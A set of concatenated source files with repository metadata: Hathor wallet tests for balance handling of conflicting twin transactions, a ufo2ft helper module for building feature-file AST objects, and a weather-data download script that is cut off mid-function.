ace754eb174a3e64836422fee58440a8bdbc7c19 | 18,399 | py | Python | tests/wallet/test_balance_update.py | jansegre/hathor-core | 22b3de6be2518e7a0797edbf0e4f6eb1cf28d6fd | [
"Apache-2.0"
] | null | null | null | tests/wallet/test_balance_update.py | jansegre/hathor-core | 22b3de6be2518e7a0797edbf0e4f6eb1cf28d6fd | [
"Apache-2.0"
] | 12 | 2020-10-04T17:14:52.000Z | 2022-03-03T22:21:56.000Z | tests/wallet/test_balance_update.py | jansegre/hathor-core | 22b3de6be2518e7a0797edbf0e4f6eb1cf28d6fd | [
"Apache-2.0"
] | null | null | null | from hathor.conf import HathorSettings
from hathor.crypto.util import decode_address
from hathor.transaction import Transaction, TxInput, TxOutput
from hathor.transaction.scripts import P2PKH
from hathor.wallet.base_wallet import SpentTx, UnspentTx, WalletBalance, WalletInputInfo, WalletOutputInfo
from hathor.wallet.exceptions import PrivateKeyNotFound
from tests import unittest
from tests.utils import add_blocks_unlock_reward, add_new_blocks, create_tokens
settings = HathorSettings()
class HathorSyncMethodsTestCase(unittest.TestCase):
def setUp(self):
super().setUp()
self.network = 'testnet'
self.manager = self.create_peer(self.network, unlock_wallet=True)
blocks = add_new_blocks(self.manager, 3, advance_clock=15)
self.blocks_tokens = [sum(txout.value for txout in blk.outputs) for blk in blocks]
address = self.get_address(0)
value = 100
self.initial_balance = sum(self.blocks_tokens[:3]) - 100
outputs = [
WalletOutputInfo(address=decode_address(address), value=int(value), timelock=None)
]
add_blocks_unlock_reward(self.manager)
self.tx1 = self.manager.wallet.prepare_transaction_compute_inputs(Transaction, outputs,
self.manager.tx_storage)
self.tx1.weight = 10
self.tx1.parents = self.manager.get_new_tx_parents()
self.tx1.timestamp = int(self.clock.seconds())
self.tx1.resolve()
self.manager.propagate_tx(self.tx1)
self.run_to_completion()
def test_balance_update1(self):
# Tx2 is twin with tx1 but less acc weight, so it will get voided
# Start balance
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
# Change of parents only, so it's a twin.
# With less weight, so the balance will continue because tx1 will be the winner
tx2 = Transaction.create_from_struct(self.tx1.get_struct())
tx2.parents = [self.tx1.parents[1], self.tx1.parents[0]]
tx2.weight = 9
tx2.resolve()
# Propagate a conflicting twin transaction
self.manager.propagate_tx(tx2)
self.run_to_completion()
meta1 = self.tx1.get_metadata(force_reload=True)
self.assertEqual(meta1.twins, [tx2.hash])
meta2 = tx2.get_metadata(force_reload=True)
self.assertEqual(meta2.voided_by, {tx2.hash})
# Balance is the same
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
# Voided wallet history
index_voided = 0
output_voided = tx2.outputs[index_voided]
address = output_voided.to_human_readable()['address']
voided_unspent = UnspentTx(tx2.hash, index_voided, output_voided.value, tx2.timestamp,
address, output_voided.token_data, voided=True)
self.assertEqual(len(self.manager.wallet.voided_unspent), 1)
voided_utxo = self.manager.wallet.voided_unspent.get((voided_unspent.tx_id, index_voided))
self.assertIsNotNone(voided_utxo)
self.assertEqual(voided_utxo.to_dict(), voided_unspent.to_dict())
input_voided = tx2.inputs[0]
key = (input_voided.tx_id, input_voided.index)
voided_spent = SpentTx(tx2.hash, input_voided.tx_id, input_voided.index, self.blocks_tokens[0],
tx2.timestamp, voided=True)
self.assertEqual(len(self.manager.wallet.voided_spent), 1)
self.assertEqual(len(self.manager.wallet.voided_spent[key]), 1)
self.assertEqual(self.manager.wallet.voided_spent[key][0].to_dict(), voided_spent.to_dict())
def test_balance_update2(self):
# Tx2 is twin with tx1 with equal acc weight, so both will get voided
# Start balance
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
# Change of parents only, so it's a twin.
# Same weight, so both will be voided then the balance increases
tx2 = Transaction.create_from_struct(self.tx1.get_struct())
tx2.parents = [self.tx1.parents[1], self.tx1.parents[0]]
tx2.resolve()
# Propagate a conflicting twin transaction
self.manager.propagate_tx(tx2)
self.run_to_completion()
meta1 = self.tx1.get_metadata(force_reload=True)
self.assertEqual(meta1.twins, [tx2.hash])
self.assertEqual(meta1.voided_by, {self.tx1.hash})
meta2 = tx2.get_metadata()
self.assertEqual(meta2.voided_by, {tx2.hash})
# Balance changed
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, sum(self.blocks_tokens[:3])))
def test_balance_update3(self):
# Tx2 is twin with tx1 with higher acc weight, so tx1 will get voided
# Start balance
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
# Change of parents only, so it's a twin.
# With higher weight, so the balance will continue because tx2 will be the winner
tx2 = Transaction.create_from_struct(self.tx1.get_struct())
tx2.parents = [self.tx1.parents[1], self.tx1.parents[0]]
tx2.weight = 13
tx2.resolve()
# Propagate a conflicting twin transaction
self.manager.propagate_tx(tx2)
self.run_to_completion()
meta1 = self.tx1.get_metadata(force_reload=True)
self.assertEqual(meta1.twins, [tx2.hash])
self.assertEqual(meta1.voided_by, {self.tx1.hash})
meta2 = tx2.get_metadata()
self.assertEqual(meta2.voided_by, None)
# Balance is the same
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
def test_balance_update4(self):
# Tx2 spends Tx1 output
# Tx3 is twin of Tx2 with same acc weight, so both will get voided
self.manager.reactor.advance(1)
# Start balance
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
address = self.manager.wallet.get_unused_address_bytes()
value = self.blocks_tokens[0] - 100
inputs = [WalletInputInfo(tx_id=self.tx1.hash, index=0, private_key=None)]
outputs = [WalletOutputInfo(address=address, value=int(value), timelock=None)]
tx2 = self.manager.wallet.prepare_transaction_incomplete_inputs(Transaction, inputs, outputs,
self.manager.tx_storage)
tx2.weight = 10
tx2.parents = [self.tx1.hash, self.tx1.parents[0]]
tx2.timestamp = int(self.clock.seconds())
tx2.resolve()
self.manager.propagate_tx(tx2)
self.run_to_completion()
# Test create same tx with allow double spending
with self.assertRaises(PrivateKeyNotFound):
self.manager.wallet.prepare_transaction_incomplete_inputs(
Transaction,
inputs=inputs,
outputs=outputs,
tx_storage=self.manager.tx_storage
)
self.manager.wallet.prepare_transaction_incomplete_inputs(Transaction, inputs=inputs, outputs=outputs,
force=True, tx_storage=self.manager.tx_storage)
# Change of parents only, so it's a twin.
tx3 = Transaction.create_from_struct(tx2.get_struct())
tx3.parents = [tx2.parents[1], tx2.parents[0]]
tx3.resolve()
# Propagate a conflicting twin transaction
self.manager.propagate_tx(tx3)
self.run_to_completion()
meta2 = tx2.get_metadata(force_reload=True)
self.assertEqual(meta2.twins, [tx3.hash])
self.assertEqual(meta2.voided_by, {tx2.hash})
meta3 = tx3.get_metadata()
self.assertEqual(meta3.voided_by, {tx3.hash})
# Balance is the same
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
def test_balance_update5(self):
# Tx2 spends Tx1 output
# Tx3 is twin of Tx1, with less acc weight
# So we have conflict between all three txs but tx1 and tx2 are winners and tx3 is voided
self.clock.advance(1)
# Start balance
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
address = self.manager.wallet.get_unused_address_bytes()
value = self.blocks_tokens[0] - 100
inputs = [WalletInputInfo(tx_id=self.tx1.hash, index=0, private_key=None)]
outputs = [WalletOutputInfo(address=address, value=int(value), timelock=None)]
tx2 = self.manager.wallet.prepare_transaction_incomplete_inputs(Transaction, inputs, outputs,
self.manager.tx_storage)
tx2.weight = 10
tx2.parents = [self.tx1.hash, self.tx1.parents[0]]
tx2.timestamp = int(self.clock.seconds())
tx2.resolve()
# Change of parents only, so it's a twin.
tx3 = Transaction.create_from_struct(self.tx1.get_struct())
tx3.parents = [self.tx1.parents[1], self.tx1.parents[0]]
tx3.resolve()
# Propagate a conflicting twin transaction
self.manager.propagate_tx(tx2)
self.manager.propagate_tx(tx3)
self.run_to_completion()
meta2 = tx2.get_metadata()
self.assertEqual(meta2.twins, [])
self.assertEqual(meta2.voided_by, None)
meta3 = tx3.get_metadata()
self.assertEqual(meta3.voided_by, {tx3.hash})
self.assertEqual(meta3.twins, [self.tx1.hash])
# Balance is the same
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
def test_balance_update6(self):
# Tx2 is twin of tx1, so both voided
# Tx3 has tx1 as parent, so increases tx1 acc weight, then tx1 is winner against tx2
self.manager.reactor.advance(1)
# Start balance
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
# Change of parents only, so it's a twin.
tx2 = Transaction.create_from_struct(self.tx1.get_struct())
tx2.parents = [self.tx1.parents[1], self.tx1.parents[0]]
tx2.resolve()
address = self.get_address(0)
value = 100
outputs = [
WalletOutputInfo(address=decode_address(address), value=int(value), timelock=None)
]
tx3 = self.manager.wallet.prepare_transaction_compute_inputs(Transaction, outputs, self.manager.tx_storage)
tx3.weight = 10
tx3.parents = [self.tx1.hash, self.tx1.parents[0]]
tx3.timestamp = int(self.clock.seconds())
tx3.resolve()
# Propagate a conflicting twin transaction
self.manager.propagate_tx(tx2)
self.manager.propagate_tx(tx3)
self.run_to_completion()
# Balance is the same
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance - 100))
def test_balance_update7(self):
# Tx2 spends Tx1 output
# Tx3 is twin of Tx1 with higher acc weight, so tx1 and tx2 are voided and tx3 is the winner
self.manager.reactor.advance(1)
# Start balance
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
address = self.manager.wallet.get_unused_address_bytes()
value = self.blocks_tokens[0] - 100
inputs = [WalletInputInfo(tx_id=self.tx1.hash, index=0, private_key=None)]
outputs = [WalletOutputInfo(address=address, value=int(value), timelock=None)]
tx2 = self.manager.wallet.prepare_transaction_incomplete_inputs(Transaction, inputs, outputs,
self.manager.tx_storage)
tx2.weight = 10
tx2.parents = [self.tx1.hash, self.tx1.parents[0]]
tx2.timestamp = int(self.clock.seconds())
tx2.resolve()
# Change of parents only, so it's a twin.
tx3 = Transaction.create_from_struct(self.tx1.get_struct())
tx3.parents = [self.tx1.parents[1], self.tx1.parents[0]]
tx3.weight = 14
tx3.resolve()
# Propagate a conflicting twin transaction
self.manager.propagate_tx(tx2)
self.manager.propagate_tx(tx3)
self.run_to_completion()
meta2 = tx2.get_metadata(force_reload=True)
self.assertEqual(meta2.twins, [])
self.assertEqual(meta2.voided_by, {self.tx1.hash})
meta3 = tx3.get_metadata(force_reload=True)
self.assertEqual(meta3.voided_by, None)
self.assertEqual(meta3.twins, [self.tx1.hash])
# Balance is the same
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
def test_balance_update_twin_tx(self):
# Start balance
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
wallet_address = self.manager.wallet.get_unused_address()
outputs2 = [
WalletOutputInfo(address=decode_address(wallet_address), value=500, timelock=None)
]
tx2 = self.manager.wallet.prepare_transaction_compute_inputs(Transaction, outputs2, self.manager.tx_storage)
tx2.weight = 10
tx2.parents = self.manager.get_new_tx_parents()
tx2.timestamp = int(self.clock.seconds())
tx2.resolve()
self.manager.propagate_tx(tx2)
self.run_to_completion()
outputs3 = [
WalletOutputInfo(address=decode_address(wallet_address), value=self.blocks_tokens[0], timelock=None)
]
tx3 = self.manager.wallet.prepare_transaction_compute_inputs(Transaction, outputs3, self.manager.tx_storage)
tx3.weight = 10
tx3.parents = self.manager.get_new_tx_parents()
tx3.timestamp = int(self.clock.seconds())
tx3.resolve()
self.manager.propagate_tx(tx3)
self.run_to_completion()
self.clock.advance(1)
new_address = self.manager.wallet.get_unused_address_bytes()
inputs = [WalletInputInfo(tx_id=tx3.hash, index=0, private_key=None)]
outputs = [WalletOutputInfo(address=new_address, value=self.blocks_tokens[0], timelock=None)]
tx4 = self.manager.wallet.prepare_transaction_incomplete_inputs(Transaction, inputs, outputs,
self.manager.tx_storage)
tx4.weight = 10
tx4.parents = [tx3.hash, tx3.parents[0]]
tx4.timestamp = int(self.clock.seconds())
tx4.resolve()
self.manager.propagate_tx(tx4)
self.run_to_completion()
# Change of parents only, so it's a twin.
tx5 = Transaction.create_from_struct(tx4.get_struct())
tx5.parents = [tx4.parents[1], tx4.parents[0]]
tx5.weight = 10
tx5.resolve()
# Propagate a conflicting twin transaction
self.manager.propagate_tx(tx5)
self.run_to_completion()
meta4 = tx4.get_metadata(force_reload=True)
self.assertEqual(meta4.twins, [tx5.hash])
meta5 = tx5.get_metadata(force_reload=True)
self.assertEqual(meta5.voided_by, {tx5.hash})
# Balance is the same
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID],
WalletBalance(0, self.initial_balance))
def test_tokens_balance(self):
# create tokens and check balances
# initial tokens
address_b58 = self.manager.wallet.get_unused_address()
address = decode_address(address_b58)
tx = create_tokens(self.manager, address_b58)
token_id = tx.tokens[0]
amount = tx.outputs[0].value
# initial token balance
self.assertEqual(self.manager.wallet.balance[token_id], WalletBalance(0, amount))
# initial hathor balance
# we don't consider HTR balance 0 because we transfer genesis tokens to this
# wallet during token creation
hathor_balance = self.manager.wallet.balance[settings.HATHOR_TOKEN_UID]
# transfer token to another wallet and check balance again
parents = self.manager.get_new_tx_parents()
_input1 = TxInput(tx.hash, 0, b'')
script = P2PKH.create_output_script(address)
token_output1 = TxOutput(30, b'', 0b00000001)
token_output2 = TxOutput(amount - 30, script, 0b00000001)
tx2 = Transaction(
weight=1,
inputs=[_input1],
outputs=[token_output1, token_output2],
parents=parents,
tokens=[token_id],
storage=self.manager.tx_storage,
timestamp=int(self.manager.reactor.seconds())
)
data_to_sign = tx2.get_sighash_all()
public_bytes, signature = self.manager.wallet.get_input_aux_data(
data_to_sign,
self.manager.wallet.get_private_key(address_b58)
)
tx2.inputs[0].data = P2PKH.create_input_data(public_bytes, signature)
tx2.resolve()
tx2.verify()
self.manager.propagate_tx(tx2)
self.run_to_completion()
# verify balance
self.assertEqual(self.manager.wallet.balance[token_id], WalletBalance(0, amount - 30))
# hathor balance remains the same
self.assertEqual(self.manager.wallet.balance[settings.HATHOR_TOKEN_UID], hathor_balance)
| 42.199541 | 116 | 0.643405 |
ace75760d01c1f7f49d245df497d9f56dabc2be3 | 61 | py | Python | JDjango/panels/models/__init__.py | JIYANG-PLUS/JDjango | 57cbb13b2b4c07f34d546c0c637c22f60c1e692a | [
"MIT"
] | 3 | 2020-12-28T05:09:02.000Z | 2021-06-23T10:02:03.000Z | JDjango/panels/models/__init__.py | JIYANG-PLUS/JDjango | 57cbb13b2b4c07f34d546c0c637c22f60c1e692a | [
"MIT"
] | null | null | null | JDjango/panels/models/__init__.py | JIYANG-PLUS/JDjango | 57cbb13b2b4c07f34d546c0c637c22f60c1e692a | [
"MIT"
] | null | null | null | from .ShowAllPipsModel import *
from .ShowUrlsModel import *
| 20.333333 | 31 | 0.803279 |
ace7577b73fed90a6c986ea5aa3c01dfbc4449ab | 8,139 | py | Python | Lib/ufo2ft/featureWriters/ast.py | googlefonts/ufo2ft | 0ee84954455cb3f451b32ab8df8509cefe025c72 | [
"MIT"
] | 73 | 2019-04-17T19:28:03.000Z | 2022-03-18T07:45:53.000Z | Lib/ufo2ft/featureWriters/ast.py | jenskutilek/ufo2ft | 3aaf7866f63cc7e9749c9cc84a43cad5c7eb1c0f | [
"MIT"
] | 228 | 2019-05-03T13:05:19.000Z | 2022-03-28T17:58:48.000Z | Lib/ufo2ft/featureWriters/ast.py | jenskutilek/ufo2ft | 3aaf7866f63cc7e9749c9cc84a43cad5c7eb1c0f | [
"MIT"
] | 21 | 2019-05-15T15:13:59.000Z | 2021-09-21T11:32:38.000Z | """Helpers to build or extract data from feaLib AST objects."""
import collections
import functools
import operator
import re
# we re-export here all the feaLib AST classes so they can be used from
# writer modules with a single `from ufo2ft.featureWriters import ast`
import sys
from fontTools import unicodedata
from fontTools.feaLib import ast
self = sys.modules[__name__]
for name in getattr(ast, "__all__", dir(ast)):
if isinstance(getattr(ast, name), type):
setattr(self, name, getattr(ast, name))
del sys, self, name
def getScriptLanguageSystems(feaFile):
"""Return dictionary keyed by Unicode script code containing lists of
(OT_SCRIPT_TAG, [OT_LANGUAGE_TAG, ...]) tuples (excluding "DFLT").
"""
languagesByScript = collections.OrderedDict()
for ls in [
st for st in feaFile.statements if isinstance(st, ast.LanguageSystemStatement)
]:
if ls.script == "DFLT":
continue
languagesByScript.setdefault(ls.script, []).append(ls.language)
langSysMap = collections.OrderedDict()
for script, languages in languagesByScript.items():
sc = unicodedata.ot_tag_to_script(script)
langSysMap.setdefault(sc, []).append((script, languages))
return langSysMap
def iterFeatureBlocks(feaFile, tag=None):
for statement in feaFile.statements:
if isinstance(statement, ast.FeatureBlock):
if tag is not None and statement.name != tag:
continue
yield statement
def findFeatureTags(feaFile):
return {f.name for f in iterFeatureBlocks(feaFile)}
def findCommentPattern(feaFile, pattern):
"""
Yield a tuple of statements, starting with the parent block, followed by
nested blocks if present, ending with the comment matching a given pattern.
There is not parent block if the matched comment is a the root level.
"""
for statement in feaFile.statements:
if hasattr(statement, "statements"):
for res in findCommentPattern(statement, pattern):
yield (statement, *res)
elif isinstance(statement, ast.Comment):
if re.match(pattern, str(statement)):
yield (statement,)
def findTable(feaLib, tag):
for statement in feaLib.statements:
if isinstance(statement, ast.TableBlock) and statement.name == tag:
return statement
def iterClassDefinitions(feaFile, featureTag=None):
if featureTag is None:
# start from top-level class definitions
for s in feaFile.statements:
if isinstance(s, ast.GlyphClassDefinition):
yield s
# then iterate over per-feature class definitions
for fea in iterFeatureBlocks(feaFile, tag=featureTag):
for s in fea.statements:
if isinstance(s, ast.GlyphClassDefinition):
yield s
LOOKUP_FLAGS = {
"RightToLeft": 1,
"IgnoreBaseGlyphs": 2,
"IgnoreLigatures": 4,
"IgnoreMarks": 8,
}
def makeLookupFlag(flags=None, markAttachment=None, markFilteringSet=None):
if isinstance(flags, str):
value = LOOKUP_FLAGS[flags]
elif flags is not None:
value = functools.reduce(operator.or_, [LOOKUP_FLAGS[n] for n in flags], 0)
else:
value = 0
if markAttachment is not None:
assert isinstance(markAttachment, ast.GlyphClassDefinition)
markAttachment = ast.GlyphClassName(markAttachment)
if markFilteringSet is not None:
assert isinstance(markFilteringSet, ast.GlyphClassDefinition)
markFilteringSet = ast.GlyphClassName(markFilteringSet)
return ast.LookupFlagStatement(
value, markAttachment=markAttachment, markFilteringSet=markFilteringSet
)
def makeGlyphClassDefinitions(groups, feaFile=None, stripPrefix=""):
"""Given a groups dictionary ({str: list[str]}), create feaLib
GlyphClassDefinition objects for each group.
Return a dict keyed by the original group name.
If `stripPrefix` (str) is provided and a group name starts with it,
the string will be stripped from the beginning of the class name.
"""
classDefs = {}
if feaFile is not None:
classNames = {cdef.name for cdef in iterClassDefinitions(feaFile)}
else:
classNames = set()
lengthPrefix = len(stripPrefix)
for groupName, members in sorted(groups.items()):
originalGroupName = groupName
if stripPrefix and groupName.startswith(stripPrefix):
groupName = groupName[lengthPrefix:]
className = makeFeaClassName(groupName, classNames)
classNames.add(className)
classDef = makeGlyphClassDefinition(className, members)
classDefs[originalGroupName] = classDef
return classDefs
def makeGlyphClassDefinition(className, members):
glyphNames = [ast.GlyphName(g) for g in members]
glyphClass = ast.GlyphClass(glyphNames)
classDef = ast.GlyphClassDefinition(className, glyphClass)
return classDef
def makeFeaClassName(name, existingClassNames=None):
"""Make a glyph class name which is legal to use in feature text.
Ensures the name only includes characters in "A-Za-z0-9._", and
isn't already defined.
"""
name = re.sub(r"[^A-Za-z0-9._]", r"", name)
if existingClassNames is None:
return name
i = 1
origName = name
while name in existingClassNames:
name = "%s_%d" % (origName, i)
i += 1
return name
def addLookupReferences(
feature, lookups, script=None, languages=None, exclude_dflt=False
):
"""Add references to named lookups to the feature's statements.
If `script` (str) and `languages` (sequence of str) are provided,
only register the lookup for the given script and languages,
optionally with `exclude_dflt` directive.
Otherwise add a global reference which will be registered for all
the scripts and languages in the feature file's `languagesystems`
statements.
"""
assert lookups
if not script:
for lookup in lookups:
feature.statements.append(ast.LookupReferenceStatement(lookup))
return
feature.statements.append(ast.ScriptStatement(script))
if exclude_dflt:
for language in languages or ("dflt",):
feature.statements.append(
ast.LanguageStatement(language, include_default=False)
)
for lookup in lookups:
feature.statements.append(ast.LookupReferenceStatement(lookup))
else:
feature.statements.append(ast.LanguageStatement("dflt", include_default=True))
for lookup in lookups:
feature.statements.append(ast.LookupReferenceStatement(lookup))
for language in languages or ():
if language == "dflt":
continue
feature.statements.append(
ast.LanguageStatement(language, include_default=True)
)
_GDEFGlyphClasses = collections.namedtuple(
"_GDEFGlyphClasses", "base ligature mark component"
)
def getGDEFGlyphClasses(feaLib):
"""Return GDEF GlyphClassDef base/mark/ligature/component glyphs, or
None if no GDEF table is defined in the feature file.
"""
for st in feaLib.statements:
if isinstance(st, ast.TableBlock) and st.name == "GDEF":
for st in st.statements:
if isinstance(st, ast.GlyphClassDefStatement):
return _GDEFGlyphClasses(
frozenset(st.baseGlyphs.glyphSet())
if st.baseGlyphs is not None
else frozenset(),
frozenset(st.ligatureGlyphs.glyphSet())
if st.ligatureGlyphs is not None
else frozenset(),
frozenset(st.markGlyphs.glyphSet())
if st.markGlyphs is not None
else frozenset(),
frozenset(st.componentGlyphs.glyphSet())
if st.componentGlyphs is not None
else frozenset(),
)
return _GDEFGlyphClasses(None, None, None, None)
| 35.233766 | 86 | 0.659909 |
ace758b63e9ce7c31a4106889b2b8c70e29637a4 | 19,973 | py | Python | weather_functions.py | jessehamner/WeatherWidget | 640901ba6edd23e26229eed37b8a227ff80cd0ba | [
"Apache-2.0"
] | 2 | 2020-05-17T17:36:49.000Z | 2020-09-10T18:05:54.000Z | weather_functions.py | jessehamner/WeatherWidget | 640901ba6edd23e26229eed37b8a227ff80cd0ba | [
"Apache-2.0"
] | 16 | 2020-03-23T16:10:26.000Z | 2021-02-21T14:30:15.000Z | weather_functions.py | jessehamner/WeatherWidget | 640901ba6edd23e26229eed37b8a227ff80cd0ba | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Weather functions to be used with the NWS radar and weather information
download script.
Jesse Hamner, 2019-2020
'''
from __future__ import print_function
import os
import re
import datetime
import json
import logging
from time import sleep
from outage import Outage
import requests
import yaml
import pytz
from bs4 import BeautifulSoup
# requests.packages.urllib3.disable_warnings()
def load_settings_and_defaults(settings_dir, settings_file, defaults_file):
"""
Load in all of the settings, default data, and organize the giant data bag
into a single dict that can be passed around. This is less elegant than it
should be.
"""
logging.info('Loading %s from %s', settings_file, settings_dir)
data = load_yaml(settings_dir, settings_file)
logging.info('Loading %s from %s', defaults_file, settings_dir)
defaults = load_yaml(settings_dir, defaults_file)
if not (data and defaults):
logging.error('Unable to load settings files. These are required.')
return False
data['defaults'] = defaults
data['today_vars'] = get_today_vars(data['timezone'])
data['bands'] = data['defaults']['goes_bands']
data['alert_counties'] = populate_alert_counties(data['counties_for_alerts'],
data['defaults']['alerts_root'])
if not data['alert_counties']:
logging.error('Unable to determine county list. Exiting now.')
return False
logging.info('alert counties: %s', str(data['alert_counties']))
data['defaults']['afd_divisions'][4] = re.sub('XXX',
data['nws_abbr'],
defaults['afd_divisions'][4])
logging.info('Defaults and settings loaded.')
return data
def prettify_timestamp(timestamp):
"""
Make a more user-readable time stamp for current conditions.
"""
posix_timestamp = datetime.datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%S+00:00')
logging.debug('Input timestamp: %s', format(timestamp))
logging.debug('Posix timestamp: %s', posix_timestamp)
timetext = datetime.datetime.strftime(posix_timestamp, '%Y-%m-%d, %H:%M:%S UTC')
logging.debug('Nicely formatted text: %s', timetext)
return timetext
def sanity_check(value, numtype='float'):
"""
Check for an actual value in the argument. If it has one, return a
formatted text string.
If it has no value, return a missing value.
"""
logging.debug('sanity_check() function input value: %s', value)
if numtype != 'float':
try:
return str('{0:.0f}'.format(float(value)))
except TypeError:
return -9999.9
try:
return str('{0:6.2f}'.format(float(value)))
except TypeError:
return -9999.9
def quick_doctext(doctext, indicator, value, unit=''):
"""
Convenience function to standardize the output format of a string.
"""
unitspace = ' '
if unit == '%':
unitspace = ''
return str('{0}\n{1} {2}{3}{4}'.format(doctext, indicator, value, unitspace, unit))
def get_metar(base_url, station):
"""
Hit up https://w1.weather.gov/data/METAR/XXXX.1.txt
and pull down the latest current conditions METAR data.
"""
metar = requests.get(os.path.join(base_url, station),
verify=False, timeout=10)
if metar.status_code != 200:
logging.error('Response from server was not OK: %s', metar.status_code)
return None
return metar.text
def outage_check(data, filename='outage.txt'):
"""
Quality assurance check on the weather service :-)
"""
outage_checker = Outage(data)
outage_checker.check_outage()
outage_result = outage_checker.parse_outage()
outfilepath = os.path.join(data['output_dir'], filename)
if outage_result is None:
logging.info('No radar outage(s) detected. Proceeding.')
try:
logging.debug('Removing file at %s', outfilepath)
os.unlink(outfilepath)
except OSError:
logging.error('File does not exist: %s', outfilepath)
else:
logging.warn('There is radar outage text: %s', outage_result)
try:
cur = open(outfilepath, 'w')
cur.write(outage_result)
cur.close()
except OSError as exc:
logging.error('OSError-- %s: %s', outfilepath, exc)
return outage_result
def write_json(some_dict, outputdir='/tmp', filename='unknown.json'):
"""
Write an individual dictionary to a JSON output file.
"""
filepath = os.path.join(outputdir, filename)
with open(filepath, 'w') as out_obj:
logging.info('writing json to %s', filepath)
try:
out_obj.write(json.dumps(some_dict))
logging.debug('raw dict: %s', some_dict)
return True
except Exception as exc:
logging.error('Ugh: %s', exc)
return False
def write_dict(filepath, some_dict):
"""
Write out a dict to a text file.
"""
with open(filepath, 'w') as current_alerts:
for key, value in some_dict.iteritems():
logging.debug('Key for this alert entry: %s', key)
current_alerts.write('{0}: {1}\n'.format(key, value))
return True
def write_text(filepath, some_text):
"""
Write a text string out to a file.
"""
with open(filepath, 'w') as text_file:
logging.debug('writing text to %s', filepath)
text_file.write(some_text)
text_file.close()
return True
def pull_beaufort_scale():
"""
Pull in the Beaufort scale information, if needed.
"""
b_url = 'https://www.weather.gov/mfl/beaufort'
pagerequest = requests.get(b_url)
if pagerequest.status_code != 200:
logging.error('Response from server was not OK: %s', pagerequest.status_code)
return None
beaufort_page = BeautifulSoup(requests.get(b_url).text, 'html')
btable = beaufort_page.find('table')
tablerows = btable.find_all('tr')
dataset = []
for i in tablerows:
row = []
cells = i.find_all('td')
for j in cells:
if re.search(r'\d{1,}-\d{1,}', j.text):
vals = j.text.split('-')
row.extend(vals)
else:
row.append(re.sub(r'\s{2,}', ' ', j.text))
dataset.append(row)
return dataset
def conditions_summary(conditions):
"""
Return a dict of consumer-level observations, say, for display on a
smart mirror or tablet.
"""
keys = ['timestamp', 'dewpoint', 'barometricPressure', 'windDirection',
'windSpeed', 'windGust', 'precipitationLastHour', 'temperature',
'relativeHumidity', 'heatIndex']
summary = dict()
for key in keys:
try:
summary[key] = conditions['properties'][key]
except Exception as exc:
summary[key] = 'none'
logging.error('Error trying to read summary for key {0}: {1}', key, exc)
return summary
def wind_direction(azimuth, data):
"""
Convert "wind coming from an azimuth" to cardinal directions
"""
try:
azimuth = float(azimuth)
except Exception as exc:
logging.error('Unable to convert azimuth to a numerical value: %s.\nReturning None.', exc)
return None
plusminus = data['defaults']['plusminus'] # 11.25 degrees
for az_deg, val in data['defaults']['azdir'].iteritems():
az_deg = float(az_deg)
if (az_deg - plusminus < azimuth) and (az_deg + plusminus >= azimuth):
return val
return 'None'
def get_hydrograph(abbr,
hydro_url='https://water.weather.gov/resources/hydrographs/',
outputdir='/tmp'):
"""
Retrieve hydrograph image (png) of the current time and specified location
Can find these abbreviations at
https://water.weather.gov/ahps2/hydrograph.php
Raw data output in XML for a location (here, "cart2"):
https://water.weather.gov/ahps2/hydrograph_to_xml.php?gage=cart2&output=xml
"""
filename = '{0}_hg.png'.format(abbr.lower())
retval = requests.get(os.path.join(hydro_url, filename), verify=False)
logging.debug('retrieving: %s', retval.url)
logging.debug('return value: %s', retval)
if retval.status_code == 200:
cur1 = open(os.path.join(outputdir, 'current_hydrograph.png'), 'wb')
cur1.write(retval.content)
cur1.close()
return retval
def get_today_vars(timezone='America/Chicago'):
"""
Get various strings from today's date for use in GOES image retrieval.
"""
today = datetime.datetime.now()
utcnow = datetime.datetime.utcnow()
local_tz = pytz.timezone(timezone)
return_dict = dict(doy=datetime.datetime.strftime(today, '%j'),
year=datetime.datetime.strftime(today, '%Y'),
day=datetime.datetime.strftime(today, '%d'),
mon=datetime.datetime.strftime(today, '%b'),
hour=datetime.datetime.strftime(today, '%H'),
minute=datetime.datetime.strftime(today, '%M'),
timezone=timezone,
offset=local_tz.utcoffset(today).total_seconds()/3600,
now=today,
utcnow=utcnow,
utcdoy=datetime.datetime.strftime(utcnow, '%j'),
utcyear=datetime.datetime.strftime(utcnow, '%Y')
)
return return_dict
def htable_current_conditions(con_dict,
tablefile='current_conditions.html',
outputdir='/tmp/'):
"""
Write out a simple HTML table of the current conditions.
"""
try:
with open(os.path.join(outputdir, tablefile), 'w') as htmlout:
htmlout.write('<table>\n')
for key, value in con_dict.iteritems():
logging.debug('%s: %s', key, value)
htmlout.write('<tr><td>{0}</td><td>{1} {2}</td></tr>\n'.format(value[2],
value[0],
value[1])
)
htmlout.write('</table>\n')
return True
